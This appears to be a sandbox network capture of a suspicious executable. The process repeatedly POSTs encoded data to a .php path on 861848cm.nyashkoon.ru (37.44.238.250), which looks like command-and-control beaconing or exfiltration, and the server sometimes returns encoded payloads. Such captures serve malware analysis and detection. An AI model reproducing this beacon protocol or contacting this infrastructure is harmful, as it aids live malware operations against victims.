                                                                                            Nov 5, 2024 23:53:05.242994070 CET | 1016 | OUT | Data Raw: 56 53 5f 5c 53 5c 50 5e 5a 5f 52 51 54 5a 5b 58 55 57 59 56 51 53 52 58 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_\S\P^Z_RQTZ[XUWYVQSRXTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<+$<3>:!*%$(4#<>(-4.&$ '"&9'X$.Q-.
                                                                                            Nov 5, 2024 23:53:05.735794067 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:05.813324928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            38 | 192.168.2.4 | 49813 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:05.948481083 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:06.305485010 CET | 1024 | OUT | Data Raw: 53 55 5a 5f 56 5a 55 59 5a 5f 52 51 54 5b 5b 5b 55 51 59 58 51 5f 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SUZ_VZUYZ_RQT[[[UQYXQ_RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%X/?&=;$\(<])*="_08^#,=+:( >X%)'X$.Q-"
                                                                                            Nov 5, 2024 23:53:06.790745974 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:06.869643927 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            39 | 192.168.2.4 | 49818 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:07.422339916 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:07.774241924 CET | 1024 | OUT | Data Raw: 53 54 5a 5c 56 5b 55 59 5a 5f 52 51 54 5b 5b 5a 55 53 59 5f 51 55 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZ\V[UYZ_RQT[[ZUSY_QURRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/<"T<^ Y+ ***6^0(#<&?.5 #&_%9'X$.Q-"
                                                                                            Nov 5, 2024 23:53:08.239286900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:08.310966969 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            40 | 192.168.2.4 | 49827 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:08.440433979 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            41 | 192.168.2.4 | 49830 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:08.611149073 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1264
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:08.961719990 CET | 1264 | OUT | Data Raw: 56 5e 5a 5c 56 5d 55 58 5a 5f 52 51 54 5b 5b 53 55 57 59 58 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: V^Z\V]UXZ_RQT[[SUWYXQ^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/?)(4Y?3;=:">'<4(?[934'_&)'X$.Q-"
                                                                                            Nov 5, 2024 23:53:09.420377016 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:09.490633965 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 5e 3f 39 35 03 26 3b 23 0c 3d 3e 3d 12 28 20 01 19 2f 32 28 5b 29 1d 3b 03 3d 38 02 54 34 3f 0d 5e 22 1c 31 5d 34 21 3b 5f 28 01 21 5f 05 1d 39 11 27 07 23 0e 2a 0c 29 01 3e 19 27 1b 25 30 23 18 28 38 2d 05 37 39 2a 57 24 2e 0b 5d 31 0c 24 09 3f 34 25 18 2e 01 09 55 27 2a 2a 57 09 16 20 12 33 33 27 5f 29 08 27 10 25 2e 3e 03 26 2a 3c 0e 3e 2c 20 00 34 27 3d 04 29 33 05 5e 36 27 26 5d 33 2a 08 43 25 2d 33 19 2b 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: ^?95&;#=>=( /2([);=8T4?^"1]4!;_(!_9'#*)>'%0#(8-79*W$.]1$?4%.U'**W 33'_)'%.>&*<>, 4'=)3^6'&]3*C%-3+&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            42 | 192.168.2.4 | 49831 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:08.736589909 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:09.086726904 CET | 1024 | OUT | Data Raw: 56 56 5a 5b 56 5a 50 59 5a 5f 52 51 54 59 5b 58 55 54 59 5e 51 5f 52 5f 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZ[VZPYZ_RQTY[XUTY^Q_R_TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%,*((3<+**-Z=-.38?#!?>,- 7Q22'X$.Q-*
                                                                                            Nov 5, 2024 23:53:09.550338984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:09.626386881 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            43 | 192.168.2.4 | 49837 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:10.080252886 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:10.430583954 CET | 1024 | OUT | Data Raw: 56 56 5a 55 56 5d 50 5b 5a 5f 52 51 54 5c 5b 5b 55 57 59 5f 51 51 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VVZUV]P[Z_RQT\[[UWY_QQRRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,2?;'?#):![?-"^'8"?Q+X#\9+ '.%'X$.Q->
                                                                                            Nov 5, 2024 23:53:10.899797916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:10.976063967 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            44 | 192.168.2.4 | 49843 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:11.107933044 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:11.461736917 CET | 1024 | OUT | Data Raw: 56 51 5a 55 56 57 50 5e 5a 5f 52 51 54 53 5b 5b 55 5d 59 5f 51 50 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VQZUVWP^Z_RQTS[[U]Y_QPR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%_-,*V(8(?08*1[>.[$Y"?&?'Z.Y!'=1'X$.Q-
                                                                                            Nov 5, 2024 23:53:11.911993027 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:11.991229057 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            45 | 192.168.2.4 | 49851 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:12.712198973 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:13.071161032 CET | 1024 | OUT | Data Raw: 56 55 5f 5b 56 5a 50 53 5a 5f 52 51 54 53 5b 5f 55 53 59 5f 51 56 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VU_[VZPSZ_RQTS[_USY_QVR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%];>=(]+#*91Z)=%;4_#/!(-0-0 1&'X$.Q-
                                                                                            Nov 5, 2024 23:53:13.542640924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:13.618491888 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:11 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            46 | 192.168.2.4 | 49859 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:13.746817112 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:14.102423906 CET | 1024 | OUT | Data Raw: 53 51 5a 5d 53 5b 55 5e 5a 5f 52 51 54 5b 5b 5f 55 56 59 5e 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: SQZ]S[U^Z_RQT[[_UVY^Q^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&,"T+<')\!Y>>_08Y !+.(:(]4$"_&9'X$.Q-"


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            47 | 192.168.2.4 | 49864 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:14.500173092 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1284
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:14.852369070 CET | 1284 | OUT | Data Raw: 53 54 5f 58 56 5f 50 5c 5a 5f 52 51 54 52 5b 53 55 5d 59 5e 51 53 52 5c 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: ST_XV_P\Z_RQTR[SU]Y^QSR\TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/2+;+7*\5=>*'+#<=<- ,&$\74!%'X$.Q-
                                                                                            Nov 5, 2024 23:53:15.319000959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:15.391180038 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 152
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 00 1e 20 58 2b 3a 21 03 24 38 24 18 28 3e 29 10 28 33 3c 03 2f 1c 33 03 2a 0d 20 59 29 06 05 09 20 11 30 07 22 21 2e 04 20 1c 27 12 3f 01 21 5f 05 1d 39 5f 24 29 0d 09 2a 22 00 5e 3e 19 30 46 32 20 0e 09 29 28 2e 5c 34 3a 03 0e 32 07 2e 01 31 1c 30 0c 3f 34 0b 17 39 2f 2b 1c 26 00 2a 57 09 16 20 1c 30 23 01 59 29 22 2c 07 27 3e 3d 12 25 04 0d 1f 3e 3c 28 04 23 0a 0c 59 2a 33 05 58 35 09 3d 04 24 04 2d 1b 25 58 34 0e 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                                            Data Ascii: X+:!$8$(>)(3</3* Y) 0"!. '?!_9_$)*"^>0F2 )(.\4:2.10?49/+&*W 0#Y)",'>=%><(#Y*3X5=$-%X4+2&U" T0]O


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            48 | 192.168.2.4 | 49866 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:14.620839119 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:15.002820015 CET | 1024 | OUT | Data Raw: 53 54 5a 5a 53 5f 50 5b 5a 5f 52 51 54 59 5b 5f 55 56 59 5f 51 5e 52 52 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: STZZS_P[Z_RQTY[_UVY_Q^RRTRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY%/5+;+? ):=->3;77:<-7X.;#Q"X1'X$.Q-*
                                                                                            Nov 5, 2024 23:53:15.444096088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:15.517302990 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            49 | 192.168.2.4 | 49873 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:15.640878916 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Nov 5, 2024 23:53:15.992999077 CET | 1024 | OUT | Data Raw: 56 53 5f 58 56 5c 50 5c 5a 5f 52 51 54 5e 5b 5b 55 5c 59 58 51 53 52 5d 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
                                                                                            Data Ascii: VS_XV\P\Z_RQT^[[U\YXQSR]TRZQWYZR^^P[_SW]]S\_U]^]SQC[_\VSWSUZTVSG[Q[CTZP^[_\P][[^^WUQSAZZP]YP^XUTZ\_PYUY\TP\XYSC[XXYPCXYPXCY^WS]R_TXYZ]]F]\UQUH\SXTY\Q[^JFXZ][EP]GUYA^YUQQ[^VXWZ_G^]W\_PY&/,.U?8^<3?(9)Z==3;#4?*V(>(.#74!2)'X$.Q-6
                                                                                            Nov 5, 2024 23:53:16.453126907 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                            Nov 5, 2024 23:53:16.526315928 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Tue, 05 Nov 2024 22:53:14 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 4
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 32 56 59 50
                                                                                            Data Ascii: 2VYP


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            50 | 192.168.2.4 | 49880 | 37.44.238.250 | 80 | 2212 | C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Nov 5, 2024 23:53:16.797646999 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                            Host: 861848cm.nyashkoon.ru
                                                                                            Content-Length: 1024
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            Nov 5, 2024 23:53:17.149292946 CET | 1024 | OUT | Data Raw: 56 5e 5f 5b 53 5a 50 5a 5a 5f 52 51 54 59 5b 5a 55 52 59 5a 51 52 52 5a 54 52 5a 51 57 59 5a 52 5e 5e 50 5b 5f 53 57 5d 5d 53 5c 5f 55 5d 5e 5d 53 51 43 5b 5f 5c 56 53 57 53 55 5a 54 56 53 47 5b 51 5b 43 54 5a 50 5e 5b 5f 5c 50 5d 5b 5b 5e 5e 57
